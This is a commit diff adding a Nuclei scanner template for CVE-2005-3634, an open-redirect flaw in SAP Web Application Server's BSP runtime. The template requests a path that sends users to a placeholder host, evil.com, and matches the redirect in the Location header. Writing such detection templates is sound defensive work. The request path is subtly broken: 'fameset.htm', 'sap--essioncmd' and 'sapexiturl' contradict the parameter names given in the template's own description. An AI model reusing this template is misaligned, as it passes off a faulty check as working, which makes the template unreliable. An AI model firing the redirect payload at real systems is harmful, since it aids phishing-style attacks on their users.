Create CVE-2005-3634.yaml

Added a New Nuclei Template as CVE-2005-3634

http/cves/2005/CVE-2005-3634.yaml

@@ -0,0 +1,43 @@
+id: CVE-2005-3634
+info:
+  name: BSP runtime in SAP Web Application Server (WAS) v6.10 through v7.00 - Open Redirect
+  description: | 
+    .frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter.
+  author: ctflearner
+  severity: medium
+  tags: 
+     - SAP Web Application Server (WAS)
+     - BSP
+     - Open redirect
+     - web
+     - cve2005
+  reference:
+    - https://www.exploit-db.com/exploits/26488 
+    - https://nvd.nist.gov/vuln/detail/CVE-2005-3634
+    - https://cxsecurity.com/issue/WLB-2005110025
+    - https://marc.info/?l=bugtraq&m=113156525006667&w=2 
+    - http://www.cybsec.com/vuln/CYBSEC_Security_Advisory_Multiple_XSS_in_SAP_WAS.pdf 
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/23031 
+    
+  classification:
+    cvss-metrics: CVSS:2.0/(AV:N/AC:L/Au:N/C:N/I:P/A:N)
+    cvss-score: 5.0
+    cve-id: CVE-2005-3634
+    cwe-id: NVD-CWE-Other
+    cpe: cpe:2.3:a:sap:sap_web_application_server:7.0:*:*:*:*:*:*:*
+  
+  metadata:
+    max-request: 1
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=http%3a%2f%2fwww.evil.com"
+    
+    
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$'
+